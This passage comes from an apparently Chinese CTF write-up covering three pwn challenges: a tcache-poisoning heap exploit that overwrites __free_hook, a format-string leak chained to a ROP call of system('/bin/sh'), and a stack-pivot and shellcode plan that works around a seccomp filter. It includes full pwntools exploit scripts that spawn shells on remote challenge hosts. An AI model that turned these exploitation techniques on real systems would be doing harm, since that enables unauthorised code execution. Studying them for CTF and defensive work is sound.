Chunk\u3002<\/li>\n\n\n\n<li>\u6b64\u65f6\uff0c\u867d\u7136 Victim \u5728\u903b\u8f91\u4e0a\u662f\u5408\u5e76\u5927\u5757\u7684\u4e00\u90e8\u5206\uff0c\u4f46\u6211\u4eec\u5728 <code>nodes<\/code> \u6570\u7ec4\u4e2d\u4ecd\u7136\u6301\u6709\u6307\u5411 Victim \u7684\u60ac\u5782\u6307\u9488\u3002<\/li>\n\n\n\n<li>\u7533\u8bf7\u4e00\u4e2a\u5757\uff08\u4ece Tcache \u53d6\u51fa\uff09\uff0c\u6d88\u8017\u6389 Tcache \u7684\u4e00\u4e2a\u7a7a\u4f4d\uff0c\u4f7f Tcache \u8ba1\u6570\u53d8\u4e3a 6\u3002<\/li>\n\n\n\n<li><strong>\u518d\u6b21\u91ca\u653e Victim<\/strong>\u3002\n<ul class=\"wp-block-list\">\n<li><strong>\u5173\u952e\u70b9<\/strong>\uff1a\u6b64\u65f6 Victim \u4f4d\u4e8e Unsorted Bin \u7684\u5927\u5757\u5185\u90e8\uff0c\u5176 <code>key<\/code> \u5b57\u6bb5\uff08\u5728 2.29 \u4e2d\u7528\u4e8e\u68c0\u6d4b Double Free\uff09\u88ab Unsorted Bin \u7684\u5143\u6570\u636e\u8986\u76d6\u6216\u5904\u4e8e\u975e Tcache \u72b6\u6001\u3002<\/li>\n\n\n\n<li>\u7531\u4e8e Tcache \u6709\u7a7a\u4f4d\uff086\/7\uff09\uff0cVictim \u88ab\u6210\u529f\u653e\u5165 Tcache \u94fe\u8868\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u73b0\u72b6<\/strong>\uff1aVictim \u73b0\u5728 <strong>\u65e2\u5728 Tcache \u94fe\u8868\u4e2d<\/strong>\uff08\u7b49\u5f85\u88ab\u5206\u914d\uff09\uff0c<strong>\u53c8\u662f Unsorted Bin \u5927\u5757\u7684\u4e00\u90e8\u5206<\/strong>\uff08\u53ef\u4ee5\u88ab\u8986\u5199\uff09\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Tcache Poisoning<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u7533\u8bf7\u4e00\u4e2a\u6bd4 Victim \u66f4\u5927\u7684\u5757\uff08\u4f8b\u5982 0x120\uff09\uff0c\u7cfb\u7edf\u4f1a\u4ece Unsorted Bin \u7684\u5927\u5757\uff080x220\uff09\u4e2d\u5207\u5272\u3002<\/li>\n\n\n\n<li>\u8fd9\u6b21\u7533\u8bf7\u7684\u5185\u5bb9\u4f1a\u8986\u76d6\u5230 Victim \u7684\u5934\u90e8\u548c <code>fd<\/code> \u6307\u9488\u3002<\/li>\n\n\n\n<li>\u6211\u4eec\u5c06 Victim \u7684 <code>fd<\/code> \u4fee\u6539\u4e3a <code>__free_hook<\/code> \u7684\u5730\u5740\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Get Shell<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u7533\u8bf7 0x100 \u5927\u5c0f\uff0c\u53d6\u56de Victim \u5757\u3002<\/li>\n\n\n\n<li>\u518d\u6b21\u7533\u8bf7 0x100 \u5927\u5c0f\uff0c\u7cfb\u7edf\u4f1a\u8fd4\u56de\u6211\u4eec\u4f2a\u9020\u7684\u5730\u5740 <code>__free_hook<\/code>\u3002<\/li>\n\n\n\n<li>\u5411 <code>__free_hook<\/code> \u5199\u5165 <code>system<\/code> \u51fd\u6570\u5730\u5740\u3002<\/li>\n\n\n\n<li>\u91ca\u653e <strong>Guard<\/strong> \u5757\uff08\u5185\u5bb9\u4e3a <code>\/bin\/sh<\/code>\uff09\uff0c\u89e6\u53d1 <code>system(\"\/bin\/sh\")<\/code>\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n<p><strong>Exp<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>context.arch = 'amd64'<br>context.log_level = 'info'<br>context.terminal = &#91;'tmux', 'splitw', '-h']<br>\u200b<br>binary_path = '.\/pwn'<br>libc_path = '.\/libc-2.29.so'<br>\u200b<br>try:<br> &nbsp; &nbsp;elf = ELF(binary_path)<br> &nbsp; &nbsp;libc = ELF(libc_path)<br>except:<br> &nbsp; &nbsp;pass<br>\u200b<br>def start_process():<br> &nbsp; &nbsp;if args.REMOTE:<br> &nbsp; &nbsp; &nbsp; &nbsp;return remote('challenge.bluesharkinfo.com', 23858)<br> &nbsp; &nbsp;else:<br> &nbsp; &nbsp; &nbsp; &nbsp;return process(binary_path)<br>\u200b<br>def add(p, size, content):<br> &nbsp; &nbsp;p.sendlineafter(b\"Your choice: \", b\"1\")<br> &nbsp; &nbsp;p.sendlineafter(b\"Size: \", str(size).encode())<br> &nbsp; &nbsp;p.sendafter(b\"Content: \", content)<br>\u200b<br>def delete(p, index):<br> &nbsp; &nbsp;p.sendlineafter(b\"Your choice: \", b\"2\")<br> &nbsp; &nbsp;p.sendlineafter(b\"Index: \", str(index).encode())<br>\u200b<br>def show(p, index):<br> &nbsp; &nbsp;p.sendlineafter(b\"Your choice: \", b\"3\")<br> &nbsp; &nbsp;p.sendlineafter(b\"Index: \", str(index).encode())<br>\u200b<br>def exploit():<br> &nbsp; &nbsp;p = start_process()<br>\u200b<br> &nbsp; &nbsp;# \u5206\u914d 7 \u4e2a\u586b\u5145\u5757 + Prev + Victim + Guard<br> &nbsp; &nbsp;# \u7d22\u5f15 0-6: Fillers<br> &nbsp; &nbsp;for i in range(7):<br> &nbsp; &nbsp; &nbsp; &nbsp;add(p, 0x100, b\"Filler\") <br> &nbsp; &nbsp;<br> &nbsp; &nbsp;add(p, 0x100, b\"Prev\") &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;add(p, 0x100, b\"Victim\") &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;add(p, 0x100, b\"\/bin\/sh\\x00\") <br>\u200b<br>\u200b<br> &nbsp; &nbsp;# \u91ca\u653e Fillers \u586b\u6ee1 Tcache<br> &nbsp; &nbsp;for i in range(7):<br> &nbsp; &nbsp; &nbsp; &nbsp;delete(p, i)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# Victim \u8fdb Unsorted Bin<br> &nbsp; &nbsp;delete(p, 8)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# \u5229\u7528 UAF \u8bfb\u53d6 fd \u6307\u9488<br> &nbsp; &nbsp;show(p, 8)<br> &nbsp; &nbsp;p.recvuntil(b\"Content: \")<br> &nbsp; &nbsp;leak = u64(p.recvline()&#91;:-1].ljust(8, b\"\\x00\"))<br> &nbsp; &nbsp;log.info(f\"Leaked Unsorted Bin Address: {hex(leak)}\")<br>\u200b<br> &nbsp; &nbsp;libc_base = leak - 96 - 0x10 - libc.symbols&#91;'__malloc_hook']<br> &nbsp; &nbsp;libc.address = libc_base<br> &nbsp; &nbsp;log.success(f\"Libc Base: {hex(libc_base)}\")<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;free_hook = libc.symbols&#91;'__free_hook']<br> &nbsp; &nbsp;system = libc.symbols&#91;'system']<br>\u200b<br>\u200b<br> &nbsp; &nbsp;# \u91ca\u653e Prev (7)\u3002\u56e0\u4e3a Victim (8) \u5728 Unsorted Bin\uff0c\u5b83\u4eec\u5408\u5e76\u6210 0x220 \u7684\u5927\u5757\u3002<br> &nbsp; &nbsp;delete(p, 7)<br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;add(p, 0x100, b\"Tcache consumer\") # Index 10<br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;delete(p, 8)<br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;# \u4ece Unsorted Bin (\u5408\u5e76\u7684\u5927\u5757) \u5207\u5272\u7533\u8bf7\u3002<br> &nbsp; &nbsp;# \u8986\u76d6\u8303\u56f4\uff1aPrev \u7684\u6570\u636e\u533a(0x100) + Victim \u7684 Header(0x10) + Victim \u7684 fd<br> &nbsp; &nbsp;payload = b'A' * 0x100<br> &nbsp; &nbsp;payload += p64(0) + p64(0x111) # \u6062\u590d Victim \u7684 Size \u5b57\u6bb5<br> &nbsp; &nbsp;payload += p64(free_hook) &nbsp; &nbsp; &nbsp;# \u4fee\u6539 Tcache \u7684 fd \u6307\u9488<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;add(p, 0x120, payload) <br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;add(p, 0x100, b\"Victim retrieval\") # Index 12 (\u53d6\u51fa Victim)<br> &nbsp; &nbsp;add(p, 0x100, p64(system)) &nbsp; &nbsp; &nbsp; &nbsp; # Index 13 (\u53d6\u51fa __free_hook)<br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;# free(Guard) -&gt; system(\"\/bin\/sh\")<br> &nbsp; &nbsp;delete(p, 9)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;p.interactive()<br>\u200b<br>if __name__ == '__main__':<br> &nbsp; &nbsp;exploit()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Heap?<\/h2>\n\n\n\n<p>\u7a0b\u5e8f\u662f\u4e00\u4e2a\u7b80\u5355\u7684\u5806\u7ba1\u7406\u5668\uff0c\u5305\u542b\u4e09\u4e2a\u4e3b\u8981\u529f\u80fd\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>add<\/strong>: \u5206\u914d\u6307\u5b9a\u5927\u5c0f\u7684\u5806\u5757\u5e76\u5199\u5165\u5185\u5bb9<\/li>\n\n\n\n<li><strong>delete<\/strong>: \u91ca\u653e\u6307\u5b9a\u7d22\u5f15\u7684\u5806\u5757<\/li>\n\n\n\n<li><strong>show<\/strong>: \u663e\u793a\u6307\u5b9a\u7d22\u5f15\u7684\u5806\u5757\u5185\u5bb9<\/li>\n<\/ul>\n\n\n\n<p><strong>(1) \u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e (show\u51fd\u6570)<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>printf(*((const char **)&amp;list + v1&#91;0])); &nbsp;\/\/ \u76f4\u63a5\u4f7f\u7528\u7528\u6237\u63a7\u5236\u7684\u5b57\u7b26\u4e32\u4f5c\u4e3a\u683c\u5f0f\u5316\u5b57\u7b26\u4e32<\/code><\/pre>\n\n\n\n<p><strong>(2) \u6808\u6ea2\u51fa\u6f0f\u6d1e (read_num\u51fd\u6570)<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>unsigned int buf; \/\/ &#91;rsp+10h] &#91;rbp-20h]<br>char v2&#91;16]; \/\/ &#91;rsp+18h] &#91;rbp-18h]<br>read(0, &amp;buf, 8uLL); &nbsp;\/\/ \u8bfb\u53d68\u5b57\u8282\u5230buf<br>read(0, v2, buf); &nbsp; &nbsp; \/\/ \u6839\u636ebuf\u7684\u503c\u8bfb\u53d6\u6570\u636e\u5230v2\uff0c\u5982\u679cbuf &gt; 16\uff0c\u4f1a\u5bfc\u81f4\u6808\u6ea2\u51fa<\/code><\/pre>\n\n\n\n<p>\u4f7f\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u6cc4\u9732\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Canary<\/strong>: \u7ed5\u8fc7\u6808\u4fdd\u62a4<\/li>\n\n\n\n<li><strong>libc\u5730\u5740<\/strong>: \u8ba1\u7b97libc\u57fa\u5740<\/li>\n\n\n\n<li><strong>\u7a0b\u5e8f\u57fa\u5740<\/strong>: \u8ba1\u7b97gadget\u5730\u5740<\/li>\n<\/ul>\n\n\n\n<p>\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u89e3\u6790\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u901a\u8fc7<code>%p<\/code>\u6cc4\u9732\u591a\u4e2a\u5730\u5740<\/li>\n\n\n\n<li>\u4ece\u6cc4\u9732\u6570\u636e\u4e2d\u8bc6\u522bcanary\uff08\u901a\u5e38\u4ee5<code>00<\/code>\u7ed3\u5c3e\uff09<\/li>\n\n\n\n<li>\u627e\u5230<code>__libc_start_main+243<\/code>\u7684\u5730\u5740\u8ba1\u7b97libc\u57fa\u5740<\/li>\n<\/ul>\n\n\n\n<p>libc\u57fa\u5740 = \u6cc4\u9732\u7684libc\u5730\u5740 &#8211; 0x29d90<\/p>\n\n\n\n<p>\u83b7\u53d6gadget\u5730\u5740\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>pop rdi; ret<\/code>: libc\u57fa\u5740 + 0x2a3e5<\/li>\n\n\n\n<li><code>ret<\/code>: libc\u57fa\u5740 + 0x29139<\/li>\n<\/ul>\n\n\n\n<p>\u83b7\u53d6\u5173\u952e\u51fd\u6570\u5730\u5740\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>system<\/code>: libc.sym[&#8216;system&#8217;]<\/li>\n\n\n\n<li><code>\/bin\/sh<\/code>\u5b57\u7b26\u4e32\u5730\u5740: <code>next(libc.search(b'\/bin\/sh\\x00'))<\/code><\/li>\n<\/ul>\n\n\n\n<p>\u7406\u89e3\u6808\u5e03\u5c40\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>rbp-0x18: v2\u7f13\u51b2\u533a\u5f00\u59cb\uff0816\u5b57\u8282\uff09<br>rbp-0x8: canary<br>rbp: saved rbp<br>rbp+0x8: \u8fd4\u56de\u5730\u5740<\/code><\/pre>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u6784\u9020payload\uff1a\n<ul class=\"wp-block-list\">\n<li>\u7531\u4e8e<code>v2<\/code>\u7684\u524d4\u5b57\u8282\u88ab\u7b2c\u4e00\u4e2a<code>read<\/code>\u7684\u540e4\u5b57\u8282\u8986\u76d6\uff0c\u6240\u4ee5\u5b9e\u9645\u53ef\u63a7\u6570\u636e\u4ece<code>v2+4<\/code>\u5f00\u59cb<\/li>\n\n\n\n<li>\u4ece<code>v2+4<\/code>\u5230canary\u7684\u504f\u79fb\uff1a<code>0x10 - 4 = 12<\/code>\u5b57\u8282<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>payload\u7ed3\u6784\uff1a4\u5b57\u8282: \u4efb\u610f\uff08\u4f1a\u88ab\u8986\u76d6\uff09<br>12\u5b57\u8282: \u586b\u5145<br>8\u5b57\u8282: canary<br>8\u5b57\u8282: saved rbp (0)<br>8\u5b57\u8282: pop rdi; ret<br>8\u5b57\u8282: \/bin\/sh\u5730\u5740<br>8\u5b57\u8282: ret (\u6808\u5bf9\u9f50)<br>8\u5b57\u8282: system\u5730\u5740<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>context.arch = 'amd64'<br>context.log_level = 'info'<br>\u200b<br>BINARY = '.\/pwn'<br>LIBC = '.\/libc.so.6'<br>LD = '.\/ld-linux-x86-64.so.2'<br>\u200b<br>elf = ELF(BINARY, checksec=False)<br>libc = ELF(LIBC, checksec=False)<br>\u200b<br>def start():<br> &nbsp; &nbsp;return remote('challenge.bluesharkinfo.com', 23616)<br>\u200b<br>def add(size, content):<br> &nbsp; &nbsp;p.sendlineafter(b'&gt; ', b'1')<br> &nbsp; &nbsp;p.sendlineafter(b'&gt; ', str(size).encode())<br> &nbsp; &nbsp;p.sendafter(b'&gt; ', content)<br> &nbsp; &nbsp;p.recvuntil(b'OK!\\n')<br>\u200b<br>def show(idx):<br> &nbsp; &nbsp;p.sendlineafter(b'&gt; ', b'3')<br> &nbsp; &nbsp;p.sendlineafter(b'&gt; ', str(idx).encode())<br> &nbsp; &nbsp;return p.recvline()<br>\u200b<br>def leak_addresses():<br> &nbsp; &nbsp;fmt_payload = b'%p.' * 50<br> &nbsp; &nbsp;add(len(fmt_payload), fmt_payload)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;p.sendlineafter(b'&gt; ', b'3')<br> &nbsp; &nbsp;p.sendlineafter(b'&gt; ', b'0')<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;leak_data = p.recvuntil(b'\\n').strip()<br> &nbsp; &nbsp;leaks = leak_data.split(b'.')<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;leak_vals = &#91;]<br> &nbsp; &nbsp;for leak in leaks:<br> &nbsp; &nbsp; &nbsp; &nbsp;if leak == b'(nil)':<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;leak_vals.append(0)<br> &nbsp; &nbsp; &nbsp; &nbsp;elif leak.startswith(b'0x'):<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;leak_vals.append(int(leak, 16))<br> &nbsp; &nbsp; &nbsp; &nbsp;else:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;leak_vals.append(0)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;canary = leak_vals&#91;6]<br> &nbsp; &nbsp;libc_leak = leak_vals&#91;12]<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;log.success(f\"Canary: {hex(canary)}\")<br> &nbsp; &nbsp;log.success(f\"Libc leak: {hex(libc_leak)}\")<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;libc.address = libc_leak - 0x29d90 &nbsp;# __libc_start_main+243<br> &nbsp; &nbsp;log.success(f\"Libc base: {hex(libc.address)}\")<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;return canary<br>\u200b<br>def exploit():<br> &nbsp; &nbsp;global p<br> &nbsp; &nbsp;p = start()<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;canary = leak_addresses()<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;pop_rdi = libc.address + 0x2a3e5 &nbsp;# pop rdi; ret<br> &nbsp; &nbsp;ret = libc.address + 0x29139 &nbsp; &nbsp; &nbsp;# ret<br> &nbsp; &nbsp;system_addr = libc.symbols&#91;'system']<br> &nbsp; &nbsp;bin_sh_addr = next(libc.search(b'\/bin\/sh\\x00'))<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;log.info(f\"pop_rdi: {hex(pop_rdi)}\")<br> &nbsp; &nbsp;log.info(f\"ret: {hex(ret)}\")<br> &nbsp; &nbsp;log.info(f\"system: {hex(system_addr)}\")<br> &nbsp; &nbsp;log.info(f\"\/bin\/sh: {hex(bin_sh_addr)}\")<br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;payload = b'0000' &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;payload += b'A' * 12 &nbsp; &nbsp; &nbsp; <br> &nbsp; &nbsp;payload += p64(canary) &nbsp; &nbsp;<br> &nbsp; &nbsp;payload += p64(0) &nbsp; &nbsp; &nbsp; &nbsp; <br> &nbsp; &nbsp;payload += p64(pop_rdi) &nbsp; &nbsp;<br> &nbsp; &nbsp;payload += p64(bin_sh_addr) <br> &nbsp; &nbsp;payload += p64(ret) &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;payload += p64(system_addr) <br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;payload = payload.ljust(0x100, b'B')<br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;p.sendlineafter(b'&gt; ', b'2') <br> &nbsp; &nbsp;p.sendafter(b'&gt; ', p32(len(payload)) + b'0\\x00\\x00\\x00')<br> &nbsp; &nbsp;p.send(payload)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;p.interactive()<br>\u200b<br>if __name__ == '__main__':<br> &nbsp; &nbsp;exploit()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">ez_stack<\/h2>\n\n\n\n<p>\u62ff\u5230\u9898\u76ee\u9644\u4ef6 <code>baby_stack<\/code>\uff0c\u9996\u5148\u8fdb\u884c\u5e38\u89c4\u68c0\u67e5\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Checksec<\/strong>:\n<ul class=\"wp-block-list\">\n<li>Arch: amd64-64-little<\/li>\n\n\n\n<li>RELRO: Full RELRO<\/li>\n\n\n\n<li>Stack: Canary found<\/li>\n\n\n\n<li>NX: NX enabled<\/li>\n\n\n\n<li>PIE: PIE enabled<\/li>\n\n\n\n<li>Seccomp: Enabled (Ban <code>execve<\/code>)<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u9006\u5411\u5206\u6790<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u7a0b\u5e8f\u4e3b\u903b\u8f91\u5728 <code>main<\/code> \u51fd\u6570\u4e2d\uff0c\u4f9d\u6b21\u8c03\u7528\u4e86\u51e0\u4e2a\u529f\u80fd\u51fd\u6570\u3002<\/li>\n\n\n\n<li><code>init_data_and_syscall<\/code>: \u521d\u59cb\u5316\u6c99\u7bb1\uff0c\u7981\u7528 <code>execve<\/code>\uff0c\u53ea\u80fd\u4f7f\u7528 ORW (Open-Read-Write) \u8bfb\u53d6 flag\u3002<\/li>\n\n\n\n<li><code>check_ret_addr_error<\/code>: \u5b58\u5728\u660e\u663e\u7684<strong>\u6808\u6ea2\u51fa\u6f0f\u6d1e<\/strong>\u3002\n<ul class=\"wp-block-list\">\n<li>\u5b9a\u4e49\u4e86\u4e00\u4e2a 264 \u5b57\u8282\u7684\u7f13\u51b2\u533a <code>v4<\/code>\u3002<\/li>\n\n\n\n<li>\u8c03\u7528 <code>read_line_from_fd<\/code> \u8bfb\u53d6\u6700\u591a 4096 \u5b57\u8282\u5230 <code>v4<\/code>\u3002<\/li>\n\n\n\n<li><strong>\u5173\u952e\u68c0\u67e5<\/strong>: \u51fd\u6570\u4f1a\u5728 <code>read<\/code> \u4e4b\u540e\u68c0\u67e5\u6808\u4e0a Return Address \u7684\u6700\u4f4e\u5b57\u8282 (LSB) \u662f\u5426\u88ab\u7be1\u6539\u3002\u5982\u679c LSB \u4e0d\u7b49\u4e8e\u539f\u59cb\u503c\uff08\u5373 <code>check_ret_addr_error<\/code> \u8fd4\u56de\u5730\u5740\u7684 LSB\uff09\uff0c\u5219\u8f93\u51fa\u9519\u8bef\u5e76\u9000\u51fa\u3002<\/li>\n\n\n\n<li><strong>Canary<\/strong>: \u867d\u7136 checksec \u663e\u793a\u6709 Canary\uff0c\u4e14\u51fd\u6570\u5f00\u5934\u8bbe\u7f6e\u4e86 Canary\uff0c\u4f46<strong>\u53cd\u6c47\u7f16\u663e\u793a\u8be5\u51fd\u6570\u5e76\u6ca1\u6709\u5728\u9000\u51fa\u524d\u68c0\u67e5 Canary<\/strong>\uff08\u6216\u8005\u662f\u6211\u4eec\u8986\u76d6 Saved RBP \u5bfc\u81f4\u63d0\u524d\u5d29\u6e83\uff09\uff0c\u56e0\u6b64\u53ef\u4ee5\u76f4\u63a5\u6ea2\u51fa\u8986\u76d6\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n<p><strong>1. \u7ed5\u8fc7\u4fdd\u62a4<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Canary<\/strong>: \u7531\u4e8e <code>check_ret_addr_error<\/code> \u7f3a\u5c11\u6709\u6548\u7684 Canary \u68c0\u67e5\uff08\u6216\u8005\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u8986\u76d6 RBP \u52ab\u6301\u63a7\u5236\u6d41\u800c\u4e0d\u89e6\u53d1\u68c0\u67e5\uff09\uff0c\u6211\u4eec\u53ef\u4ee5\u5c06\u5176\u89c6\u4e3a\u586b\u5145\u6570\u636e\u76f4\u63a5\u8986\u76d6\u3002<\/li>\n\n\n\n<li><strong>Return Address Check<\/strong>: \u8fd9\u662f\u4e00\u4e2a\u5f88\u96be\u7f20\u7684\u68c0\u67e5\u3002\u5982\u679c\u6211\u4eec\u76f4\u63a5\u8986\u76d6\u8fd4\u56de\u5730\u5740\u8fdb\u884c ROP\uff0cLSB \u80af\u5b9a\u4f1a\u6539\u53d8\uff08\u56e0\u4e3a Payload \u901a\u5e38\u5305\u542b NULL \u5b57\u8282\u6216\u5730\u5740\u968f\u673a\u5316\uff09\uff0c\u5bfc\u81f4\u68c0\u67e5\u5931\u8d25\u7a0b\u5e8f\u9000\u51fa\u3002\n<ul class=\"wp-block-list\">\n<li><strong>\u89e3\u51b3\u65b9\u6848<\/strong>: \u6211\u4eec\u5fc5\u987b\u6784\u9020\u4e00\u4e2a Return Address\uff0c\u5176 <strong>LSB \u4e0e\u539f\u59cb\u8fd4\u56de\u5730\u5740\u5b8c\u5168\u4e00\u81f4<\/strong>\u3002<\/li>\n\n\n\n<li>\u539f\u59cb\u8fd4\u56de\u5730\u5740\u662f <code>main<\/code> \u4e2d <code>call check_ret_addr_error<\/code> (0x1896) \u7684\u4e0b\u4e00\u6761\u6307\u4ee4\uff0c\u5373 <strong>0x189b<\/strong>\u3002LSB \u4e3a <strong>0x9b<\/strong>\u3002<\/li>\n\n\n\n<li>\u6211\u4eec\u5229\u7528 Stack Pivot \u6280\u672f\uff0c\u5c06\u6808\u52ab\u6301\u5230\u6211\u4eec\u53ef\u63a7\u7684\u5185\u5b58\u533a\u57df\uff0c\u4ece\u800c\u7ed5\u8fc7\u540e\u7eed\u7684\u9650\u5236\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p><strong>2. \u6808\u8fc1\u79fb<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u5229\u7528\u70b9<\/strong>: <code>main<\/code> \u51fd\u6570\u548c <code>check_ret_addr_error<\/code> \u51fd\u6570\u90fd\u4f7f\u7528 <code>leave; ret<\/code> \u6307\u4ee4\u4f5c\u4e3a\u7ed3\u5c3e\u3002\n<ul class=\"wp-block-list\">\n<li><code>leave<\/code> \u7b49\u4ef7\u4e8e <code>mov rsp, rbp; pop rbp<\/code>\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Payload \u6784\u9020<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u6211\u4eec\u8986\u76d6\u6808\u4e0a\u7684 <strong>Saved RBP<\/strong> \u4e3a\u6211\u4eec\u60f3\u8981\u8fc1\u79fb\u5230\u7684\u5730\u5740\uff08<strong>FAKE_RBP<\/strong>\uff09\u3002<\/li>\n\n\n\n<li>\u6211\u4eec\u8986\u76d6 <strong>Return Address<\/strong> \u4e3a <code>main<\/code> \u51fd\u6570\u4e2d <code>check_ret_addr_error<\/code> \u8fd4\u56de\u540e\u7684\u5730\u5740 <strong>0x189b<\/strong>\u3002<\/li>\n\n\n\n<li>\u8fd9\u6837\uff0c<code>check_ret_addr_error<\/code> \u8fd4\u56de\u65f6\uff1a\n<ol class=\"wp-block-list\">\n<li>\u68c0\u67e5\u901a\u8fc7\uff08LSB 0x9b == 0x9b\uff09\u3002<\/li>\n\n\n\n<li>\u6267\u884c <code>leave<\/code>\uff0c\u5c06 <code>Saved RBP<\/code>\uff08\u4e5f\u5c31\u662f <code>FAKE_RBP<\/code>\uff09\u5f39\u5165 <code>rbp<\/code> \u5bc4\u5b58\u5668\u3002<\/li>\n\n\n\n<li>\u6267\u884c <code>ret<\/code>\uff0c\u8df3\u8f6c\u5230 <code>0x189b<\/code>\u3002<\/li>\n<\/ol>\n<\/li>\n\n\n\n<li>\u56de\u5230 <code>main<\/code> (0x189b)\uff1a\n<ol class=\"wp-block-list\">\n<li>\u7ee7\u7eed\u6267\u884c\uff0c\u9047\u5230 <code>0x189e<\/code> \u7684 <code>leave<\/code> \u6307\u4ee4\u3002<\/li>\n\n\n\n<li><code>leave<\/code> \u6267\u884c <code>mov rsp, rbp<\/code>\u3002\u6b64\u65f6 <code>rbp<\/code> \u5df2\u7ecf\u662f\u6211\u4eec\u7684 <code>FAKE_RBP<\/code>\u3002<\/li>\n\n\n\n<li><strong>\u6808\u8fc1\u79fb\u6210\u529f\uff01<\/strong> <code>rsp<\/code> \u88ab\u52ab\u6301\u5230\u4e86 <code>FAKE_RBP<\/code>\u3002<\/li>\n\n\n\n<li><code>leave<\/code> \u7ee7\u7eed\u6267\u884c <code>pop rbp<\/code>\uff0c<code>rsp<\/code> \u6307\u5411 <code>FAKE_RBP + 8<\/code>\u3002<\/li>\n\n\n\n<li><code>ret<\/code> \u6267\u884c <code>pop rip<\/code>\uff0c\u4ece <code>FAKE_RBP + 8<\/code> \u5904\u53d6\u51fa\u5730\u5740\u5e76\u8df3\u8f6c\u3002<\/li>\n<\/ol>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p><strong>3. Shellcode \u5e03\u5c40<\/strong><\/p>\n\n\n\n<p>\u7531\u4e8e PIE \u548c ASLR\uff0c\u6211\u4eec\u5f88\u96be\u5728\u5806\u6808\u4e0a\u627e\u5230\u56fa\u5b9a\u7684 shellcode \u5730\u5740\u3002\u4f46\u662f\u9898\u76ee\u63d0\u4f9b\u4e86\u4e00\u4e2a\u7279\u6b8a\u7684\u56fa\u5b9a\u5730\u5740\u5185\u5b58\u533a\u57df\uff1a<strong>0x114514000<\/strong>\u3002<code>read_line_from_fd<\/code> \u5141\u8bb8\u6211\u4eec\u5728 <code>main<\/code> \u5f00\u59cb\u65f6\u5411\u8fd9\u4e2a\u5730\u5740\u5199\u5165 16 \u5b57\u8282\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Stage 1 Payload (\u4f4d\u4e8e 0x114514000)<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u524d 8 \u5b57\u8282\uff1a<strong>Stage 1 Shellcode<\/strong>\u3002<\/li>\n\n\n\n<li>\u540e 8 